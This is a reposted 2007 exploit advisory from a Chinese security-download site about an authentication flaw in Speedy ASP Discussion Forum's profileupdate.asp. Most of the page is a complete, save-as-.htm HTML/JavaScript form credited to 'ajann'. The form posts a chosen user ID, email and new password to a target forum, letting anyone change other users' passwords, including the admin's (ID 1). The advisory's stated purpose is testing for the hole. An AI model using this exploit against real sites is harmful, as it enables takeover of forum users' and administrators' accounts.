 |
|
 |
您现在的位置: 精品下载 >> 安全 >> 网络安全 >> 安全中心正文 |  用户登录  新用户注册 |
|
||||
| Speedy ASP Forum User Pass Change | ||||
| 作者:佚名 安全中心来源:不详 点击数: 更新时间:2007-10-10 | ||||
"Speedy Asp Discussion Forum is an Open Source ASP Discussion forum software designed to consume the least amount of server resources and provide super fast performance." Improper authentication allow to any user to change other users details, the following exploit code can be used to test the system's immunity if vulnerability to the problem. Credit: The information has been provided by ajann. Details Exploit: <!-- # Title : Speedy ASP Forum(profileupdate.asp) User Pass Change Exploit # Dork : Copyright ASPwebSoft # Author : ajann # greetz : Nukedx ###Code: Save to .htm --> <title>Pass Change</title> <script language="JavaScript"> //Coded ajann function islemKontrol(){ if(document.InputForm.name.value=="" || document.InputForm.email.value=="" || document.InputForm.id.value=="" || document.InputForm.password.value=="" || document.InputForm.passwordre.value=="" || document.InputForm.country.options.value == 0 || document.InputForm.adres.value=="" ){ alert("Alani Bos Biraktiniz") return false } { document.InputForm.action= document.InputForm.adres.value document.InputForm.submit(); return true } } </script> <body bgcolor="#000000"> <form name = "InputForm" method = "post" onSubmit = 'return islemKontrol()'> <b><font color="#808080" face="Verdana">Speedy Forum User Pass Change // ajann</font></b><p><font face="Verdana" size="2" color="#FF0000"><b>User Name : </b></font> <input type="text" name="name" value="" size="20"> <font size="1" color="#C0C0C0" face="Arial"> Example: Surname Name</font><br> <font face="Verdana" size="2" color="#FF0000"><b>User Mail :</b></font> <input type="text" name="email" value="" size="20"> <font size="1" color="#C0C0C0" face="Arial"> Example: mail@domain.com</font><br> <font face="Verdana" size="2" color="#FF0000"><b>User İd :</b></font> <input type="text" name="id" value="" size="20"> <font size="1" color="#C0C0C0" face="Arial">Example: İd:1 Admin</font><br> <font face="Verdana" size="2" color="#FF0000"><b>User Country:</b> </font> <select size="1" name="country"> <option value=0>Choose Country</option> <option value="Turkey">Turkey</option> </select> <font size="1" color="#C0C0C0" face="Arial"> Example: Turkey</font><br> <b> <font face="Verdana" size="2" color="#FF0000">User </font> <font face="Verdana" size="2" color="#0000FF">Pass </font> <font face="Verdana" size="2" color="#FF0000"> :</font></b> <input type = "text" name="password" value="Password" size="20"> <font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br> <b> <font face="Verdana" size="2" color="#FF0000">User </font> <font face="Verdana" size="2" color="#0000FF">RePass</font><font face="Verdana" size="2" color="#FF0000"> :</font></b> <input type = "text" name="passwordre" value="Re Password" size="20"> <font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br> <font face="Verdana" size="2" color="#FF0000"><b>Form Action: </b> </font> <input type="text" name="adres" value="profileupdate.asp" size="20"> <font size="1" color="#C0C0C0" face="Arial"> Example: http://[target]/[path]/profileupdate.asp</font></p> <p> <input type = "submit" name="Submit" value="Change"> </p> <br> </form> <!-- EoF --> |
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)